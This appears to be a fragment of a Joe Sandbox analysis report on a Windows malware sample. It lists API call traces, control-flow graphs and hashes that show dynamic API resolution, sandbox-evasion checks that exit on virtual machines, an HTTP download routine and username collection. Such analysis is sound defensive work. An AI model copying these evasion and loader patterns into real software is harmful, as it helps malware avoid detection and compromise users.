                                  • GetProcAddress.KERNEL32(74DD0000,011C90B8), ref: 002D644B
                                  • GetProcAddress.KERNEL32(74DD0000,011B56B0), ref: 002D6463
                                  • GetProcAddress.KERNEL32(74DD0000,011B5830), ref: 002D647B
                                  • GetProcAddress.KERNEL32(74DD0000,011C22A8), ref: 002D6494
                                  • GetProcAddress.KERNEL32(74DD0000,011C23C8), ref: 002D64AC
                                  • GetProcAddress.KERNEL32(74DD0000,011C23E0), ref: 002D64C4
                                  • GetProcAddress.KERNEL32(74DD0000,011C24D0), ref: 002D64DD
                                  • GetProcAddress.KERNEL32(74DD0000,011B5A70), ref: 002D64F5
                                  • GetProcAddress.KERNEL32(74DD0000,011C24E8), ref: 002D650D
                                  • GetProcAddress.KERNEL32(74DD0000,011C2500), ref: 002D6526
                                  • GetProcAddress.KERNEL32(74DD0000,011B56F0), ref: 002D653E
                                  • GetProcAddress.KERNEL32(74DD0000,011C2218), ref: 002D6556
                                  • GetProcAddress.KERNEL32(74DD0000,011C2230), ref: 002D656F
                                  • GetProcAddress.KERNEL32(74DD0000,011B5A90), ref: 002D6587
                                  • GetProcAddress.KERNEL32(74DD0000,011C22D8), ref: 002D659F
                                  • GetProcAddress.KERNEL32(74DD0000,011B5770), ref: 002D65B8
                                  • LoadLibraryA.KERNEL32(011C2578,?,?,?,002D1C03), ref: 002D65C9
                                  • LoadLibraryA.KERNEL32(011C25C0,?,?,?,002D1C03), ref: 002D65DB
                                  • LoadLibraryA.KERNEL32(011C2530,?,?,?,002D1C03), ref: 002D65ED
                                  • LoadLibraryA.KERNEL32(011C2548,?,?,?,002D1C03), ref: 002D65FE
                                  • LoadLibraryA.KERNEL32(011C2590,?,?,?,002D1C03), ref: 002D6610
                                  • GetProcAddress.KERNEL32(75A70000,011C25D8), ref: 002D662D
                                  • GetProcAddress.KERNEL32(75290000,011C2560), ref: 002D6649
                                  • GetProcAddress.KERNEL32(75290000,011C2518), ref: 002D6661
                                  • GetProcAddress.KERNEL32(75BD0000,011C25A8), ref: 002D667D
                                  • GetProcAddress.KERNEL32(75450000,011B5790), ref: 002D6699
                                  • GetProcAddress.KERNEL32(76E90000,011C8F48), ref: 002D66B5
                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 002D66CC
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 002D66C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: ab3d3f6e3abc0d88bb39db51884d8ed335e02025d4e09892fc4db953a3e9de3c
                                  • Instruction ID: ad2f854b06a7c6d599a56f56078ca62b6da362653e7164c3610c9d1add50af58
                                  • Opcode Fuzzy Hash: ab3d3f6e3abc0d88bb39db51884d8ed335e02025d4e09892fc4db953a3e9de3c
                                  • Instruction Fuzzy Hash: 86A164F59112819FDB54DF65EDC8A2637B9F788240380863DE919CB3A2DB34AD00DF68
                                  Function 002D1BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2141 2d1bf0-2d1c0b call 2b2a90 call 2d6390 2146 2d1c0d 2141->2146 2147 2d1c1a-2d1c27 call 2b2930 2141->2147 2148 2d1c10-2d1c18 2146->2148 2151 2d1c29-2d1c2f lstrcpy 2147->2151 2152 2d1c35-2d1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 2d1c6d-2d1c7b GetSystemInfo 2152->2156 2157 2d1c65-2d1c67 ExitProcess 2152->2157 2158 2d1c7d-2d1c7f ExitProcess 2156->2158 2159 2d1c85-2d1ca0 call 2b1030 call 2b10c0 GetUserDefaultLangID 2156->2159 2164 2d1cb8-2d1cca call 2d2ad0 call 2d3e10 2159->2164 2165 2d1ca2-2d1ca9 2159->2165 2171 2d1ccc-2d1cde call 2d2a40 call 2d3e10 2164->2171 2172 2d1ce7-2d1d06 lstrlen call 2b2930 2164->2172 2165->2164 2166 2d1cb0-2d1cb2 ExitProcess 2165->2166 2171->2172 2184 2d1ce0-2d1ce1 ExitProcess 2171->2184 2178 2d1d08-2d1d0d 2172->2178 2179 2d1d23-2d1d40 lstrlen call 2b2930 2172->2179 2178->2179 2181 2d1d0f-2d1d11 2178->2181 2186 2d1d5a-2d1d7b call 2d2ad0 lstrlen call 2b2930 2179->2186 2187 2d1d42-2d1d44 2179->2187 2181->2179 2185 2d1d13-2d1d1d lstrcpy lstrcat 2181->2185 2185->2179 2193 2d1d7d-2d1d7f 2186->2193 2194 2d1d9a-2d1db4 lstrlen call 2b2930 2186->2194 2187->2186 2188 2d1d46-2d1d54 lstrcpy lstrcat 2187->2188 2188->2186 2193->2194 2195 2d1d81-2d1d85 2193->2195 2199 2d1dce-2d1deb call 2d2a40 lstrlen call 2b2930 2194->2199 2200 2d1db6-2d1db8 2194->2200 2195->2194 2197 2d1d87-2d1d94 lstrcpy lstrcat 2195->2197 2197->2194 2206 2d1ded-2d1def 2199->2206 2207 2d1e0a-2d1e0f 2199->2207 2200->2199 2202 2d1dba-2d1dc8 lstrcpy lstrcat 2200->2202 2202->2199 2206->2207 2208 2d1df1-2d1df5 2206->2208 2209 2d1e16-2d1e22 call 2b2930 2207->2209 2210 2d1e11 call 2b2a20 2207->2210 2208->2207 2211 2d1df7-2d1e04 lstrcpy lstrcat 2208->2211 2215 2d1e24-2d1e26 2209->2215 2216 2d1e30-2d1e66 call 2b2a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2218 2d1e28-2d1e2a lstrcpy 2215->2218 2228 2d1e8c-2d1ea0 CreateEventA call 2d1b20 call 2cffd0 2216->2228 2229 2d1e68-2d1e8a CloseHandle Sleep OpenEventA 2216->2229 2218->2216 2233 2d1ea5-2d1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                                  APIs
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C2440), ref: 002D63E9
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C24A0), ref: 002D6402
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C2488), ref: 002D641A
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C2380), ref: 002D6432
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C90B8), ref: 002D644B
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011B56B0), ref: 002D6463
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011B5830), ref: 002D647B
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C22A8), ref: 002D6494
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C23C8), ref: 002D64AC
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C23E0), ref: 002D64C4
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C24D0), ref: 002D64DD
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011B5A70), ref: 002D64F5
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C24E8), ref: 002D650D
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D1C2F
                                  • ExitProcess.KERNEL32 ref: 002D1C67
                                  • GetSystemInfo.KERNEL32(?), ref: 002D1C71
                                  • ExitProcess.KERNEL32 ref: 002D1C7F
                                    • Part of subcall function 002B1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 002B1046
                                    • Part of subcall function 002B1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 002B104D
                                    • Part of subcall function 002B1030: ExitProcess.KERNEL32 ref: 002B1058
                                    • Part of subcall function 002B10C0: GlobalMemoryStatusEx.KERNEL32 ref: 002B10EA
                                    • Part of subcall function 002B10C0: ExitProcess.KERNEL32 ref: 002B1114
                                  • GetUserDefaultLangID.KERNEL32 ref: 002D1C8F
                                  • ExitProcess.KERNEL32 ref: 002D1CB2
                                  • ExitProcess.KERNEL32 ref: 002D1CE1
                                  • lstrlen.KERNEL32(011C9038), ref: 002D1CEE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D1D15
                                  • lstrcat.KERNEL32(00000000,011C9038), ref: 002D1D1D
                                  • lstrlen.KERNEL32(002E4B98), ref: 002D1D28
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1D48
                                  • lstrcat.KERNEL32(00000000,002E4B98), ref: 002D1D54
                                  • lstrlen.KERNEL32(00000000), ref: 002D1D63
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1D89
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002D1D94
                                  • lstrlen.KERNEL32(002E4B98), ref: 002D1D9F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1DBC
                                  • lstrcat.KERNEL32(00000000,002E4B98), ref: 002D1DC8
                                  • lstrlen.KERNEL32(00000000), ref: 002D1DD7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1DF9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002D1E04
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                  • String ID:
                                  • API String ID: 3366406952-0
                                  • Opcode ID: 81538a9702acb7c260cb51d73cf7ffeb697af8793a740be51e452e51f5b5af47
                                  • Instruction ID: 57c23d4080afe98c8808e7649af0cf056d8f89fc38742fb279308cbe041b71c2
                                  • Opcode Fuzzy Hash: 81538a9702acb7c260cb51d73cf7ffeb697af8793a740be51e452e51f5b5af47
                                  • Instruction Fuzzy Hash: 7971B331520356EBDB20AFB0DC89B6E777AAF44741F14403AF94A9B292DF309C25CB64
                                  Function 002B6C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2234 2b6c40-2b6c64 call 2b2930 2237 2b6c66-2b6c6b 2234->2237 2238 2b6c75-2b6c97 call 2b4bc0 2234->2238 2237->2238 2239 2b6c6d-2b6c6f lstrcpy 2237->2239 2242 2b6caa-2b6cba call 2b2930 2238->2242 2243 2b6c99 2238->2243 2239->2238 2247 2b6cc8-2b6cf5 InternetOpenA StrCmpCA 2242->2247 2248 2b6cbc-2b6cc2 lstrcpy 2242->2248 2244 2b6ca0-2b6ca8 2243->2244 2244->2242 2244->2244 2249 2b6cfa-2b6cfc 2247->2249 2250 2b6cf7 2247->2250 2248->2247 2251 2b6ea8-2b6ebb call 2b2930 2249->2251 2252 2b6d02-2b6d22 InternetConnectA 2249->2252 2250->2249 2261 2b6ec9-2b6ee0 call 2b2a20 * 2 2251->2261 2262 2b6ebd-2b6ebf 2251->2262 2253 2b6d28-2b6d5d HttpOpenRequestA 2252->2253 2254 2b6ea1-2b6ea2 InternetCloseHandle 2252->2254 2256 2b6d63-2b6d65 2253->2256 2257 2b6e94-2b6e9e InternetCloseHandle 2253->2257 2254->2251 2259 2b6d7d-2b6dad HttpSendRequestA HttpQueryInfoA 2256->2259 2260 2b6d67-2b6d77 InternetSetOptionA 2256->2260 2257->2254 2263 2b6daf-2b6dd3 call 2d71e0 call 2b2a20 * 2 2259->2263 2264 2b6dd4-2b6de4 call 2d3d90 2259->2264 2260->2259 2262->2261 2265 2b6ec1-2b6ec3 lstrcpy 2262->2265 2264->2263 2275 2b6de6-2b6de8 2264->2275 2265->2261 2276 2b6dee-2b6e07 InternetReadFile 2275->2276 2277 2b6e8d-2b6e8e InternetCloseHandle 2275->2277 2276->2277 2279 2b6e0d 2276->2279 2277->2257 2281 2b6e10-2b6e15 2279->2281 2281->2277 2283 2b6e17-2b6e3d call 2d7310 2281->2283 2286 2b6e3f call 2b2a20 2283->2286 2287 2b6e44-2b6e51 call 2b2930 2283->2287 2286->2287 2291 2b6e53-2b6e57 2287->2291 2292 2b6e61-2b6e8b call 2b2a20 InternetReadFile 2287->2292 2291->2292 2293 2b6e59-2b6e5b lstrcpy 2291->2293 2292->2277 2292->2281 2293->2292
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B6C6F
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B6CC2
                                  • InternetOpenA.WININET(002DCFEC,00000001,00000000,00000000,00000000), ref: 002B6CD5
                                  • StrCmpCA.SHLWAPI(?,011CE9C8), ref: 002B6CED
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002B6D15
                                  • HttpOpenRequestA.WININET(00000000,GET,?,011CE2E0,00000000,00000000,-00400100,00000000), ref: 002B6D50
                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002B6D77
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002B6D86
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 002B6DA5
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002B6DFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B6E5B
                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 002B6E7D
                                  • InternetCloseHandle.WININET(00000000), ref: 002B6E8E
                                  • InternetCloseHandle.WININET(?), ref: 002B6E98
                                  • InternetCloseHandle.WININET(00000000), ref: 002B6EA2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B6EC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                  • String ID: ERROR$GET
                                  • API String ID: 3687753495-3591763792
                                  • Opcode ID: bb663c56b8f3978c4043f21138edccd0508d31c5506bd59735667e80348d0562
                                  • Instruction ID: 11fbd7d450b164347530134792a9cb02c904477346171d2751e2f2cc0e978bf1
                                  • Opcode Fuzzy Hash: bb663c56b8f3978c4043f21138edccd0508d31c5506bd59735667e80348d0562
                                  • Instruction Fuzzy Hash: E681C571A21316ABEB10DFA4DC89FEE77B8EF04740F104069F909EB281DB74AD148B94
                                  Function 002B4A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2850 2b4a60-2b4afc RtlAllocateHeap 2867 2b4b7a-2b4bbe VirtualProtect 2850->2867 2868 2b4afe-2b4b03 2850->2868 2869 2b4b06-2b4b78 2868->2869 2869->2867
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B4AA3
                                  • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 002B4BB0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-3329630956
                                  • Opcode ID: ef960fe798a3b006da220a208ca458ccc45d675f568ff7628e4f4d263ffc198b
                                  • Instruction ID: 93c07da1791484087da83532bc74fc9cd821cd52ee96cd526358bbbeb98d6011
                                  • Opcode Fuzzy Hash: ef960fe798a3b006da220a208ca458ccc45d675f568ff7628e4f4d263ffc198b
                                  • Instruction Fuzzy Hash: A6310B18FE029C768620FBEF4D47F5F6ED5DF87760B824056750877182C9A95520CAE2
                                  Function 002D2A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 002D2A6F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D2A76
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 002D2A8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 3677e5ad00bf07cd781cab4c0a6830dddb13ce331ab693f1d3e5d8d02e4602ea
                                  • Instruction ID: 3bc6ac3113041f49c51a80ef662c327b95b57dcba402f4eda9288a7493d25329
                                  • Opcode Fuzzy Hash: 3677e5ad00bf07cd781cab4c0a6830dddb13ce331ab693f1d3e5d8d02e4602ea
                                  • Instruction Fuzzy Hash: 0BF0B4B1A40244ABC710DF88DD49F9EBBBCF705B21F000226F915E33C0D774190486A1
                                  Function 002D66E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 2d66e0-2d66e7 634 2d66ed-2d6af9 GetProcAddress * 43 633->634 635 2d6afe-2d6b92 LoadLibraryA * 8 633->635 634->635 636 2d6c08-2d6c0f 635->636 637 2d6b94-2d6c03 GetProcAddress * 5 635->637 638 2d6c15-2d6ccd GetProcAddress * 8 636->638 639 2d6cd2-2d6cd9 636->639 637->636 638->639 640 2d6d4f-2d6d56 639->640 641 2d6cdb-2d6d4a GetProcAddress * 5 639->641 642 2d6d5c-2d6de4 GetProcAddress * 6 640->642 643 2d6de9-2d6df0 640->643 641->640 642->643 644 2d6df6-2d6f0b GetProcAddress * 12 643->644 645 2d6f10-2d6f17 643->645 644->645 646 2d6f8d-2d6f94 645->646 647 2d6f19-2d6f88 GetProcAddress * 5 645->647 648 2d6f96-2d6fbc GetProcAddress * 2 646->648 649 2d6fc1-2d6fc8 646->649 647->646 648->649 650 2d6fca-2d6ff0 GetProcAddress * 2 649->650 651 2d6ff5-2d6ffc 649->651 650->651 652 2d70ed-2d70f4 651->652 653 2d7002-2d70e8 GetProcAddress * 10 651->653 654 2d70f6-2d714d GetProcAddress * 4 652->654 655 2d7152-2d7159 652->655 653->652 654->655 656 2d716e-2d7175 655->656 657 2d715b-2d7169 GetProcAddress 655->657 658 2d7177-2d71ce GetProcAddress * 4 656->658 659 2d71d3 656->659 657->656 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,011B58F0), ref: 002D66F5
                                  • GetProcAddress.KERNEL32(74DD0000,011B59D0), ref: 002D670D
                                  • GetProcAddress.KERNEL32(74DD0000,011C9628), ref: 002D6726
                                  • GetProcAddress.KERNEL32(74DD0000,011C9670), ref: 002D673E
                                  • GetProcAddress.KERNEL32(74DD0000,011C96D0), ref: 002D6756
                                  • GetProcAddress.KERNEL32(74DD0000,011C9610), ref: 002D676F
                                  • GetProcAddress.KERNEL32(74DD0000,011BB798), ref: 002D6787
                                  • GetProcAddress.KERNEL32(74DD0000,011CD028), ref: 002D679F
                                  • GetProcAddress.KERNEL32(74DD0000,011CD100), ref: 002D67B8
                                  • GetProcAddress.KERNEL32(74DD0000,011CD178), ref: 002D67D0
                                  • GetProcAddress.KERNEL32(74DD0000,011CCFB0), ref: 002D67E8
                                  • GetProcAddress.KERNEL32(74DD0000,011B57F0), ref: 002D6801
                                  • GetProcAddress.KERNEL32(74DD0000,011B5910), ref: 002D6819
                                  • GetProcAddress.KERNEL32(74DD0000,011B5930), ref: 002D6831
                                  • GetProcAddress.KERNEL32(74DD0000,011B5810), ref: 002D684A
                                  • GetProcAddress.KERNEL32(74DD0000,011CD0A0), ref: 002D6862
                                  • GetProcAddress.KERNEL32(74DD0000,011CD088), ref: 002D687A
                                  • GetProcAddress.KERNEL32(74DD0000,011BB9F0), ref: 002D6893
                                  • GetProcAddress.KERNEL32(74DD0000,011B5A30), ref: 002D68AB
                                  • GetProcAddress.KERNEL32(74DD0000,011CD040), ref: 002D68C3
